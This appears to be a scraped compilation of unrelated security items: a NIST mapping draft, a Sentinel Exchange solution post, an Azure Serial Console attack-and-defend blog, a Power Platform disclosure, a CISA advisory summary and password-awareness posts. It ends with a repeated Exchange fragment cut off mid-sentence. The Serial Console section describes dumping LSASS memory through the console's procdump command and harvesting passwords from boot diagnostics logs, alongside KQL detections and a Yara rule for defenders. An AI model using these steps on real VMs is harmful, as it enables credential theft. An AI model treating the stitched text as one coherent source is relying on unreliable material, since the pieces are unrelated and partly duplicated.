Understanding how the elements of diverse sources of cybersecurity and privacy content are related to each other is an ongoing challenge for people in nearly every organization. This document explains NIST’s proposed approach for identifying and documenting relationships between concepts such as controls, requirements, recommendations, outcomes, technologies, functions, processes, techniques, roles, and skills.
NIST intends for the approach to be used for mapping relationships involving NIST cybersecurity and privacy publications that will be submitted to NIST’s National Online Informative References (OLIR) Program for hosting in NIST’s online Cybersecurity and Privacy Reference Tool (CPRT). This will include mapping the equivalent of the NIST Cybersecurity Framework’s (CSF) 1.1 Informative References in support of CSF 2.0.
By following this approach, NIST and others in the cybersecurity and privacy standards community can jointly establish a single concept system over time that links cybersecurity and privacy concepts from many sources into a cohesive, consistent set of relationship mappings. The mappings can then be used by different audiences to better describe the interrelated aspects of the global cybersecurity and privacy corpus.
The public comment period for this draft is open through October 6, 2023. Download a copy of the draft and submit your comments to [email protected].
We recently published two solutions in the Sentinel content hub catalog to assist you with better detecting threats and misconfigurations of your Exchange environment. One solution is focused on on-premises Exchange Server and the second is for Exchange Online. Both solutions can be used simultaneously when you have a hybrid Exchange environment.
Why now?
In the past years, we have seen an increase in attacks against messaging environments. Taking control of an Exchange Server or abusing someone’s mailbox can have catastrophic consequences for your organization. Analyzing previous Exchange security incidents highlighted that there are detection gaps and common misconfigurations. Both of which could have easily been avoided. When it comes to Exchange on-premises deployments, it is common to see configurations which have grown organically through upgrades and various administrators. Management and administrative practices may also not have kept pace with threat actors and have not changed in decades. Many configuration components are simply overlooked. Logs are rarely collected and centralized, either slowing or preventing investigations.
Introducing Microsoft Exchange Security solutions
The two solutions aim to close detections gaps and proactively identifying misconfigurations before they become a security incident. They allow collections of critical logs, detect misconfigurations and present the information in dynamic dashboards.
The Exchange Server solution looks at the following core components:
standard and custom RBAC delegation
remote domain configuration
local administrators permissions
high privileged groups members
POP/IMAP configuration
send and receive connector configuration
The Exchange Online solution looks at the following core components:
standard and custom RBAC delegation
Amongst the scenarios the solution enables, you will find the following:
Alert you when an administrative cmdlet is executed against a VIP user to exfiltrate content or modify who can access it (you decide who are the VIPs).
Detect if a server-oriented cmdlet and a user-oriented cmdlet which are monitored are launched by the same user on the same server in 10 minutes delay.
Improve your Exchange security posture by exposing misconfiguration on your Exchange environments.
Detect the usage of custom Exchange RBAC configuration that can put your environment at risk.
Report on admin activities to optimize your delegation model.
How does it work?
The base of the solution uses a script which directly connects to Microsoft Sentinel and uploads the results of security configurations (this script runs on-premises for the on-premises version, and in an Azure Automation runbook for the online version). It uses the Log Analytics ingestion API to directly send data to your Sentinel workspace.
Note that the solution does support the collection of multiple Exchange organizations and multi-tenants within the same Sentinel workspace.
You can also configure the solution to upload additional data such as audit logs, security events of Exchange servers and/or domain controllers and IIS log files by using either the Azure Monitoring Agent with Azure Arc or the Microsoft Monitoring Agent
You can then explore the data with carefully crafted workbooks to visualize your posture and trigger incidents with analytics rules to alert you to important security events.
Your Exchange security posture quickly visualized:
A workbook helping you to apply the Least Privilege principle:
To monitor activities on mailboxes and especially on designated VIP mailboxes:
Data ingestion
To keep the solution cost effective, you can select the level of data you wish to collect from your environment. The more data you collect and the more detection scenarios you enable. To help you pick the right collection level, you can refer to this table:
Collection option
Data to upload
Volume
Valuable for workbooks
Valuable for hunting
0
Configuration scripts result
Low
High
Low
1
Exchange related event logs of Exchange servers
Medium
Medium
Medium
2
Security/Application/System event logs of Exchange servers
Medium
Low to Medium
Medium
3
Security logs of domain controllers located in the Exchange sites
Medium to High
Low to Medium
Medium
4
Security logs of all domain controllers
High
Low to Medium
Medium to High
5
IIS logs of Exchange servers
High
Low
High
6
Message tracking of all Exchange servers
High
Low
Low to Medium
7
HTTP proxy logs of all Exchange servers
High
High
High
Except for collection option 0, all other options are independent. They are deployed as a Microsoft Sentinel Connector using DCR rules or Azure Monitor Agent and you can activate/deactivate the options when you want.
Get started!
Connect to your Microsoft Sentinel workspace, click on the Content hub blade and search for Microsoft Exchange Security:
Review the details and click Install to get started!
Alternatively, you can navigate to the respective solutions landing page in Azure:
Ever had a virtual machine crash? Azure Serial console is a great way to directly connect to your Virtual machine and debug what went wrong. Azure Serial Console is a feature that’s available for free for everyone. While the primary intent of this feature is to assist users debug their machine, there are several interesting ways to abuse the features and compromise sensitive information. Let’s dive deep into the feature and explore various ways to exploit various features and ways to detect exploitation activity.
Contents
What’s Azure Serial Console?
Why Azure Serial Console can be a good target for an adversary?
Enable logging for user operation tracking
Different techniques to exploit features of Azure Serial Console
Hunting for suspicious operations
Best practices
Conclusion
What’s Azure Serial Console?
Azure Serial Console connects to “ttyS0” or “COM1” serial ports of the Virtual Machine (VM) or Virtual Machine scale set (VMSS) instance and provide access independent of network or operating system state. It’s a text based console for VM and VMSS on Azure that’s generally available for public, in all Azure regions (except Azure China Cloud) and is in public preview in Azure Government. To know more
Pre-conditions to access Azure Serial Console:
Boot diagnostics must be enabled for the VM (This can be enabled while creating a VM)
An identity with at-least “Virtual Machine Contributor role”.
Credentials to the VM/VMSS (for few attack scenarios, this is not required.)
Why Azure Serial Console can be a good target for an adversary?
Azure Serial Console is very leveraged to circumvent security features and that’s precisely the reason why it’s a sweet target for Adversaries.
Imagine a scenario where your Virtual machine is lockdown with RDP/SSH or other access has been disabled/restricted. This is typically the case for a lot of production grade setups where the authentication is locked down to specific IPs or subnets. Azure Serial Console isn’t bound by the NSG restrictions and can assist an attacker get CLI access to the machine.
Microsoft Defender for Cloud offers Just in time access (JIT), a great feature that allows admins to enable access only when access is needed, on the ports needed, and for the period of time needed. For VMs where JIT is enabled, Azure Serial Console can still be used to connect to VMs without having to request access through JIT.
Enable logging for user operation tracking
There are several ways to stream logs and analyze but for the sake of this blog, we will be creating a log analytics workspace and stream logs to the created workspace. This would allow us to analyze the activity without owning a logging solution. However, this would differ according to your setup. If your setup has an SIEM, the schema, query language might be different.
Creation of Log Analytics Workspace
Step-1: Go to Creation of Log Analytics Workspace on Azure Portal, select the appropriate subscription, resource group and Name. Please note that Azure Monitor comes in 2 SKU’s. For more information about the pricing details on Azure Log Analytics, please check here.
Enabling Azure Activity Log monitoring
Step-1: Go to Activity Log, and click on “Export Activity Logs”.
Step-2: Click on “Add diagnostic setting” and select “Administrative” and “Security” Categories. Click on “Send to Log Analytics Workspace” and select the log analytics workspace that was created here.
Enabling Windows Event Log monitoring
Please note that this might not be required depending on your current setup. Feel free to skip this step if your cloud compute workloads are already being monitored either with Microsoft Sentinel or another Security monitoring solution (such as SIEM).
Step-2: Download Azure Monitor and Configure it. Go to Agents, download Windows Agent 64 Bit or 32 Bit. Follow on-screen instructions and install the agent. Once the installation is complete, proceed to the next step.
Step-3: Create a data collection rule. Go to Creation Wizard and fill in the name, resource group and location. Follow the instructions in the video below to complete the log configuration. Use the following XPath to backup “Sysmon” logs.Copy
Step-4: Verify if the Azure activity logs and Windows Event Logs are properly received by using the following KQL queries. Go to the VM that you have created for testing and check the Logs section in the left side navigation bar
Check Azure Activity Logs
Copy
AzureActivity
| summarize count() by OperationNameValue
| count
Check Windows Event Logs
Copy
Event
| count
If the output is anything greater than 0, it means you have successfully configured logging.
Different techniques to exploit features of Azure Serial Console
Please note that the following are limited to possibilities on a Windows Operating System.
Execution of Command:
Azure Serial console’s primary feature is to enable execution of commands. Provided that the attacker has credentials to the VM, an adversary can execute commands with root/admin privileges on a VM. This doesn’t provide a GUI access but the CLI access can be used to execute commands, maintain persistance and move laterally across the network. To execute commands on a VM using Azure serial console, the following steps can be followed.
Go to Serial Console option on the left navigation bar and once the prompt loads, enter cmd to create a command prompt channel.
Enter ch -sn Cmd0001 to switch to the channel’s context, press ENTER and then enter the credentials to login into the CLI of the VM.
The same can be done using Az CLI. The command az serial-console connect -n <VM_Name> -g <ResourceGroup_Name> can be used to connect using Az CLI. Know more
Tracing of User activity performed using Azure Serial Console:
Assuming that you have followed all the steps (Installing Sysmon, Configuring Windows Event logging), the following KQL query can be used to trace activities performed using Azure Serial Console. The logic that’s used for the query is gathering all the logon IDs from windows event ID: 4624 where the LogonProcess is scaccess.exe and identifying processes whose SubjectLogonId belongs to the list of Logon IDs gathered in previous step.Copy
let PIDs = Event
| where EventID == 4624
| extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","")
| where LoginProcessName has "sacsess.exe"
| extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"")
| distinct LogonID;
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"")
| where LogonID in (PIDs)
Using, Azure Activity Logs, we can trace the connection attempts performed by an adversary:Copy
AzureActivity
| where OperationNameValue =~ "MICROSOFT.SERIALCONSOLE/SERIALPORTS/CONNECT/ACTION"
| where ActivityStatusValue =~ "Success"
Dumping of a specific process
One of the most interesting attack vector that Azure serial console enables is dumping a process without any authentication. The following are the steps that can be followed to achieve the same.
Use t command to list of all the processes. Once you identify the process and identify the PID of the process that you want to dump.
Use the PID identified in the previous step and use the command procdump <PID> <LOCATION_OF_THE_FILE>. In the following example, we are dumping LSASS.exe’s process memory.
Tracing of dumping activity performed using Azure Serial Console:
For the process dumps that are created using this process, the following query can be used.Copy
Event
| where EventID == 11
| where RenderedDescription has "lsass.dmp"
The query searches for the creation of the file lsass.dmp in the event logs related to File creation (Event ID: 11 generated by Sysmon).
Further analysis indicated that the dump file is created by svchost.exe [Command Line of the file creation process: C:\Windows\system32\svchost.exe -k netsvcs -p ]whose parent process is services.exe and grandparent process is wininit.exe. This is interesting as there is no indication that this activity was performed using the serial console.
This activity is currently detected by Microsoft Defender for Endpoint. Further guidance on how to detect and prevent LSASS dumping is documented here.
The process tree evidence as seen in Defender for Endpoint is below:
The creation of the lsass dumping can be detected with the help of the below Yara rule.Copy
rule creation_of_dmp {
meta:
author = "Subhash P <@pbssubhash>"
filetype = "DUMP File"
date = "1/1/2023"
version = "1.0"
strings:
$md = { 4d 44 4d 50 }
$a1 = "SeDebugPrivilege" fullword wide
$a2 = "\\pipe\\lsass" fullword wide
$a3 = "lsasspirpc" fullword wide
condition:
($md at 0) and all of ($a*)
}
Enumeration and other capabilities
Azure Serial Console offers few other capabilities in unauthenticated SAC console mode.Please note that the following is an exhaustive list of commands(other than procdump) that are available with SAC:
Command
Short Description
Security Implication
ch
Channel management commands
None
cmd
Create a command prompt channel
Execute Commands on the VM
d
Dump the current kernel log
Aid an adversary in performing recon
f
Toggle detailed or abbreviated tlist info
Aid an adversary in performing recon
i
List all IP network numbers and their IP addresses and set IP info
Aid an adversary in performing recon
id
Display the computer identification information
Aid an adversary in performing recon
k <pid>
Kill the given process
Aid an adversary to cause Denial of Service
l <pid>
Lower the priority of a process to the lowest possible.
Aid an adversary to degrade performance of a service
lock
Lock access to Command Prompt channels.
Aid an adversary to cause Denial of Service
m <pid> <MB-allow>
Limit the memory usage of a process to .
Aid an adversary to degrade performance of a service
p
Toggle paging the display.
None
r <pid>
Raise the priority of a process by one
None
s
Display the current time and date (24 hour clock used).
None
s mm/dd/yyyy hh:mm
Set the current time and date (24 hour clock used).
Aid an adversary to cause Denial of service
t
Display the task list.
Aid an adversary in performing recon
restart
Restart the system immediately.
Aid an adversary to cause Denial of Service
shutdown
Shutdown the system immediately.
Aid an adversary to cause Denial of Service
crashdump
Crash the system. You must have crash dump enabled.
Aid an adversary to cause Denial of Service
livedump [-u] [-h]
Create a live kernel dump. Optional arguments will include userspace (-u) and hypervisor (-h) memory in the dump.
Exfiltrate Secrets from the dump
Tracing of the activity performed by an adversary:
The actions performed by an adversary using Azure Serial Console (inside the command line channel and otherwise) can be traced using Boot diagnostics logs. They can be viewed in the Help section in the left navigation bar. They can’t be exported or streamed to an external location.
The log itself enables an attacker to mint credentials and other secrets present in command line parameters for commands such as net user <username> <password> /add. As any command typed in, using Azure Serial Console is logged here, if an admin uses commands with secrets in command line, they can be extracted by an adversary. To identify if an adversary has visited Boot diagnostics, the following query can be used:Copy
AzureActivity
| where OperationNameValue == "MICROSOFT.COMPUTE/VIRTUALMACHINES/RETRIEVEBOOTDIAGNOSTICSDATA/ACTION"
| where ActivityStatusValue == "Success"
Hunting for suspicious operations
Suspicious Azure Serial Console Interactions in Azure Activity logs:
Unusual IP or user interaction: The following query identifies any Azure Serial console interaction done using an identity from an IP address that isn’t used in the last 30 days. While this is a very naive way of filtering, advanced techniques such as UEBA are available with Azure Sentinel.Copylet 30DaysData = AzureActivity | where TimeGenerated >= ago(30d) | distinct Caller, CallerIpAddress; let Callers = 30DaysData | distinct Caller; let IPs = 30DaysData | distinct CallerIpAddress; AzureActivity | where TimeGenerated >= ago(1d) | where not(Caller has_any(Callers) and CallerIpAddress has_any(IPs))
Failed access attempts: The following query identifies failed attempts to access Azure Serial Console. This may be due to an adversary performing recon to identify if they have access to console.CopyAzureActivity | where TimeGenerated >= ago(7d) | where OperationNameValue =~ "MICROSOFT.SERIALCONSOLE/SERIALPORTS/CONNECT/ACTION" | where ActivityStatusValue != "Success"
Risky Signin with subsequent serial console action: The following query identifies risky users accessing Azure Serial Console. Please note that logging has to be enabled by following this guide.. The following query can be used to get the list of risky users and check if the same IP that triggered Microsoft Identity security algorithms have been used to access serial console.Copylet RiskyUsersData = AADUserRiskEvents |summarize by UserPrincipalName, IpAddress; let RiskyCallers = RiskyUsersData | distinct UserPrincipalName; let RiskyIPs = RiskyUsersData | distinct IpAddress; AzureActivity | where OperationNameValue == "MICROSOFT.SERIALCONSOLE/SERIALPORTS/CONNECT/ACTION" | where Caller has_any (RiskyCallers) and CallerIpAddress has_any (RiskyIPs)
Suspicious operations in Windows Event logs:
LOLBIN Execution through Azure Serial Console: The following query extracts the list of LOLBINs from the lolbas API and with a bit of pre-processing, identifies processes created using Azure Serial console and checks if any binaries identified previously are present.Copylet LolBins = externaldata(Name:string,Description:string,Author:string,Created:datetime , Commands: dynamic, FullPath:dynamic, Detection:dynamic)[ "https://lolbas-project.github.io/api/lolbas.json" ] with(format="multijson"); let ExecLols = LolBins | mv-expand Commands | extend Category = Commands['Category'] | distinct Name; let PIDs = Event | where EventID == 4624 | extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","") | where LoginProcessName has "sacsess.exe" | extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"") | distinct LogonID; Event | where Source == "Microsoft-Windows-Sysmon" and EventID == 1 | extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"") | where LogonID in (PIDs) | where EventID == 1 // and EventData has "svchost" | extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>",""), ProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.Image.>.*?</Data>",0,EventData),'Image">',""),@'<Data Name="',''),"</Data>",""), ParentProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.ParentImage.>.*?</Data>",0,EventData),'ParentImage">',""),@'<Data Name="',''),"</Data>",""), CommandLine = replace_string(replace_string(replace_string(extract(@"<Data Name=.CommandLine.>.*?</Data>",0,EventData),'CommandLine">',""),@'<Data Name="',''),"</Data>","") | extend ProcessName = split(ProcessName,@"\")[-1] | where ProcessName has_any(ExecLols)
Powershell execution through Azure Serial Console: The following query identifies processes that are created using Azure Serial console and have the keyword powershell in them.Copylet PIDs = Event | where EventID == 4624 | extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","") | where LoginProcessName has "sacsess.exe" | extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"") | distinct LogonID; Event | where Source == "Microsoft-Windows-Sysmon" and EventID == 1 | extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"") | where LogonID in (PIDs) | where EventID == 1 // and EventData has "svchost" | extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>",""), ProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.Image.>.*?</Data>",0,EventData),'Image">',""),@'<Data Name="',''),"</Data>",""), ParentProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.ParentImage.>.*?</Data>",0,EventData),'ParentImage">',""),@'<Data Name="',''),"</Data>",""), CommandLine = replace_string(replace_string(replace_string(extract(@"<Data Name=.CommandLine.>.*?</Data>",0,EventData),'CommandLine">',""),@'<Data Name="',''),"</Data>","") | where CommandLine has "powershell"
Network Connections through processes initiated through Azure Serial Console: The following query identifies processes that are created using Azure Serial console and checks if there are any Sysmon Event ID: 3 events which are created when a network connection is initiated.Copylet PIDs = Event | where EventID == 4624 | extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","") | where LoginProcessName has "sacsess.exe" | extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"") | distinct LogonID; let ProcID =Event | where Source == "Microsoft-Windows-Sysmon" and EventID == 1 | extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"") | where LogonID in (PIDs) | where EventID == 1 | extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>",""), ProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.Image.>.*?</Data>",0,EventData),'Image">',""),@'<Data Name="',''),"</Data>",""), ParentProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.ParentImage.>.*?</Data>",0,EventData),'ParentImage">',""),@'<Data Name="',''),"</Data>",""), CommandLine = replace_string(replace_string(replace_string(extract(@"<Data Name=.CommandLine.>.*?</Data>",0,EventData),'CommandLine">',""),@'<Data Name="',''),"</Data>","") | distinct ProcessId; Event | where EventID == 3 | extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>","") | where ProcessId has_any(ProcID)
Creation of Services using Azure Serial Console (using command line parameters): The following query detects the usage of sc.exe to create services.
Copy
let PIDs = Event
| where EventID == 4624
| extend LoginProcessName = replace_string(extract(@"Process Name:[\t]+[\w|\\|:|.]+",0,RenderedDescription),"Process Name:","")
| where LoginProcessName has "sacsess.exe"
| extend LogonID = replace_string(extract(@"TargetLogonId.>[\w|\d]+",0,EventData),'TargetLogonId">',"")
| distinct LogonID;
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| extend LogonID = replace_string(extract(@"LogonId.>[\w|\d]+",0,EventData),'LogonId">',"")
| where LogonID in (PIDs)
| where EventID == 1 // and EventData has "svchost"
| extend ProcessId = replace_string(replace_string(replace_string(extract(@"<Data Name=.ProcessId.>[\S]+</Data>",0,EventData),'ProcessId">',""),@'<Data Name="',''),"</Data>",""),
ProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.Image.>.*?</Data>",0,EventData),'Image">',""),@'<Data Name="',''),"</Data>",""),
ParentProcessName = replace_string(replace_string(replace_string(extract(@"<Data Name=.ParentImage.>.*?</Data>",0,EventData),'ParentImage">',""),@'<Data Name="',''),"</Data>",""),
CommandLine = replace_string(replace_string(replace_string(extract(@"<Data Name=.CommandLine.>.*?</Data>",0,EventData),'CommandLine">',""),@'<Data Name="',''),"</Data>","")
| where CommandLine has "sc"
Best Practices:
The following is a non-exhaustive list of best practices that we recommend for keeping Azure Serial Console secure:
Enforce usage of MFA for all the users with “Virtual machine contributor” access.
Regularly audit for RBAC permissions of users to ensure that the list of privileged users it’s up-to-date.
Perform regular monitoring of activity using Azure Serial console by leveraging Azure Activity and Host based logs.
Conclusion
While Azure Serial Console is a really good feature that allows developers and administrators to troubleshoot during tough times, it can become a security liability if not monitored and locked down. In the next part, we intend to cover Azure Serial console attack and defend when using a Linux flavoured OS.
Grow your skills at Security Virtual Training Day: Defend Against Threats and Secure Cloud Environments from Microsoft Learn. At this free event, you’ll learn to perform advanced hunting, detections, and investigations, and remediate security alerts with Microsoft Defender and Microsoft Sentinel. Using automated extended detection and response (XDR) in Microsoft Defender and unified cloud-native security information and event management (SIEM) through Microsoft Sentinel, you’ll learn to confidently perform investigations and remediations to help defend against threats. You will have the opportunity to: Learn how to investigate, respond to, and hunt for threats using Microsoft Sentinel, Microsoft Defender for Cloud, and Microsoft 365 Defender. Use Microsoft Defender for Cloud to perform cloud security posture management and to help protect cloud workloads. Understand ways to help protect people and data against cyberthreats with Microsoft technologies. Join us at an upcoming two-part event: Wednesday, September 13, 2023 | 2:30 PM – 5:15 PM | (GMT-05:00) Eastern Time (US & Canada) Thursday, September 14, 2023 | 2:30 PM – 4:30 PM | (GMT-05:00) Eastern Time (US & Canada)
Delivery Language: English Closed Captioning Language(s): English
On 30 March 2023, Tenable informed Microsoft under Coordinated Vulnerability Disclosure (CVD) of a security issue concerning Power Platform Custom Connectors using Custom Code. This feature allows customers to write code for custom connectors. This issue has been fully addressed for all customers and no customer remediation action is required.
Customer Impact
The vulnerability could lead to unauthorized access to Custom Code functions used for Power Platform custom connectors. The potential impact could be unintended information disclosure if secrets or other sensitive information were embedded in the Custom Code function.
Our investigation into the report identified anomalous access only by the security researcher that reported the incident, and no other actors. All impacted customers have been notified of this anomalous access by the researcher through the Microsoft 365 Admin Center (MC665159).
Fix Release
Microsoft issued an initial fix on 7 June 2023 to mitigate this issue for a majority of customers. Investigation into the subsequent report from Tenable on 10 July 2023 revealed that a very small subset of Custom Code in a soft deleted state were still impacted. This soft deleted state exists to enable quick recovery in case of accidental deletion of custom connectors as a resiliency mechanism. Microsoft engineering took steps to ensure and validate complete mitigation for any potentially remaining customers using Custom Code functions. This work was completed on 2 August 2023.
As part of preparing security fixes, we follow an extensive process involving thorough investigation, update development, and compatibility testing. Ultimately, developing a security update is a delicate balance between speed and safety of applying the fix and quality of the fix. Moving too quickly could result in more customer disruption (in terms of availability) than the risk customers bear from an embargoed security vulnerability. The purpose of an embargo period is to provide time for a quality fix. Not all fixes are equal. Some can be completed and safely applied very quickly, others can take longer. In order to protect our customers from an exploit of an embargoed security vulnerability, we also start to monitor any reported security vulnerability of active exploitation and move swiftly if we see any active exploit. As both a service provider and a security company, Microsoft appreciates being part of an ecosystem of organizations focused on protecting customers as the highest priority over all other goals.
Microsoft also appreciates the security community’s research and disclosure of vulnerabilities. Responsible research and mitigation are critical for safeguarding our customers and this comes with a shared responsibility to be factual, understand processes and work together. Any deviation from this process puts customers and our communities at undue security risk. As always, Microsoft’s top priority is to protect and be transparent with our customers and we remain steadfast in our mission.
Q: How do I know if I was affected by this unauthorized information disclosure?
A: Microsoft notified affected customers about this issue via Microsoft 365 Admin Center (MC665159) starting on 4 August 2023. If you did not receive this notification, then no action is required.
Q: How do I know if a notification was sent to my organization?
A: We sent Microsoft 365 Admin Center notifications to affected customers using a Data Privacy tag which means only users with a global administrator role or a Message center privacy reader role can view the notification. These roles are appointed by your organization. You can learn more about these roles and how to assign them here.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners are releasing a joint Cybersecurity Advisory (CSA), 2022 Top Routinely Exploited Vulnerabilities. This advisory provides details on the top Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2022, and the associated Common Weakness Enumeration(s) (CWE), to help organizations better understand the impact exploitation could have on their systems. International partners include: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NCSC-NZ), New Zealand Computer Emergency Response Team (CERT-NZ), and the United Kingdom’s National Cyber Security Centre (NCSC-UK), and the United Kingdom’s National Cyber Security Centre (NCSC-UK).
The authoring agencies urge all organizations to review and implement the recommended mitigations detailed in this advisory. The advisory provides vendors, designers, and developers recommendations on implementing secure-by-design and -default principles and tactics to reduce the prevalence of vulnerabilities in their software and end-user organizations’ recommendations to reduce the risk of compromise by malicious cyber actors.
Organizations should share information about incidents and unusual cyber activity with their respective cybersecurity authorities because when cyber incidents are reported quickly, it can contribute to stopping further attacks.
In the U.S., organizations should inform CISA’s 24/7 Operations Center at [email protected] or (888) 282-0870, or an FBI field office.
No matter the account, all #passwords should be created with these 3 words in mind: Long (12+ characters) Unique (never reuse passwords) and Complex (a combination of upper and lower case letters, spaces, numbers and special characters) Learn more: https://staysafeonline.org/online-safety-privacy-basics/passwords-securing-accounts/ #CybersecurityAwarenessMonth
Organize your ever growing list of online accounts with a password manager. They can manage all your online credentials like usernames and passwords. It stores them in a safe, encrypted database and also generates new ones when needed. Learn more: https://staysafeonline.org/online-safety-privacy-basics/password-managers/ #CybersecurityAwarenessMonth
Lock it up! Strong passwords are your first line of defense against cyber threats. Don’t settle for weak combinations. Create unique and complex passwords for each account, and consider using a password manager for added convenience and security. Learn more: https://staysafeonline.org/online-safety-privacy-basics/passwords-securing-accounts/ #CybersecurityAwarenessMonth
Avoid common password pitfalls! Hackers love easy targets, so don’t make it easy for them. Say no to password123 or qwerty. Opt for unique and complex passwords – let a password manager do the heavy lifting for you. It’s time to level up your security. Learn more: https://staysafeonline.org/online-safety-privacy-basics/passwords-securing-accounts/ #CybersecurityAwarenessMonth
Any device that connects to the internet is vulnerable to risks. The best defense is to keep device security software, web browser and operating systems up to date. Turn on auto-updates! Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenessMonth
All those update alerts from your software are important to install! Not only do they fix things that might be buggy, they also patch up any security holes. Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenssMonth
Pay attention to software update alerts and set your software to auto-update–it’s an easy way to keep things safe. Set it and forget it! Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenssMonth
Don’t let vulnerabilities linger! Update, update, update! Keeping your software up to date is crucial for a secure digital life. Enable automatic updates to protect your devices against the latest threats. Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenssMonth
Set it and forget it! With automatic software updates, you don’t have to worry about manually checking for updates. Embrace the convenience and let your devices take care of themselves. Stay on top of security and enjoy peace of mind. Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenssMonth
Outsmart the cyber threats! Hackers are always looking for vulnerabilities to exploit. Stay a step ahead by enabling automatic software updates. Think of them as an invisible shield that fortifies your devices against emerging risks. Stay safe, stay updated! Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenssMonth
The power of timely updates! Automatic software updates work silently to protect your devices. Say goodbye to outdated software and embrace the power of the latest features, enhanced performance, and tightened security. Learn more: https://staysafeonline.org/resources/software-updates/ #CybersecurityAwarenssMonth
Cybercriminals cast wide nets with #phishing tactics, hoping to drag in victims. They may offer a financial reward, threaten you if you don’t engage, or claim that someone is in need of help. Stop, take a moment, and think before you click. Learn more: https://staysafeonline.org/theft-fraud-cybercrime/phishing/ #CybersecurityAwarenessMonth
Tips for Spotting a Phish: 1) They create a sense of urgency or claim to need help. 2) They ask for your personal info. 3) They want you to download a file or click on a link. Learn more: https://staysafeonline.org/theft-fraud-cybercrime/phishing/ #CybersecurityAwarenessMonth
Think before you click! Phishing emails disguise themselves as harmless messages, but they’re actually dangerous digital piranhas swimming in your inbox. Stay vigilant, spot the signs, and report those fraudulent emails. Together, we can #StaySafeOnline! Learn more: https://staysafeonline.org/theft-fraud-cybercrime/phishing/ #CybersecurityAwarenessMonth
Don’t get hooked! Phishing emails are like sneaky bait trying to reel you in. Learn how to spot them and report those fishy attempts to keep your inbox clean and your personal information safe. Learn more: https://staysafeonline.org/theft-fraud-cybercrime/phishing/ #CybersecurityAwarenessMonth
Phishing: The art of deception. Cybercriminals are getting crafty, sending emails that look legit but aim to steal your information. Trust your gut, stay cautious, and report those phishing emails. Learn more: https://staysafeonline.org/theft-fraud-cybercrime/phishing/ #CybersecurityAwarenessMonth
Your inbox is your fortress! Phishing emails try to breach your defenses, but you can outsmart them. Learn the telltale signs of phishing, such as misspellings, suspicious attachments, or urgent requests, and report those fraudulent messages. Learn more: https://staysafeonline.org/theft-fraud-cybercrime/phishing/ #CybersecurityAwarenessMonth
Passwords are like the gatekeepers of your online kingdom! But why settle for one guard when you can have two? Multi-factor authentication doubles the security, making your accounts nearly impenetrable. Keep the baddies at bay! Learn more: https://staysafeonline.org/online-safety-privacy-basics/multi-factor-authentication/ #CybersecurityAwarenessMonth
Note that the solution does support the collection of multiple Exchange organizations and multi-tenants within the same Sentinel workspace.
You can also configure the solution to upload additional data such as audit logs, security events of Exchange servers and/or domain controllers and IIS log files by using either the 
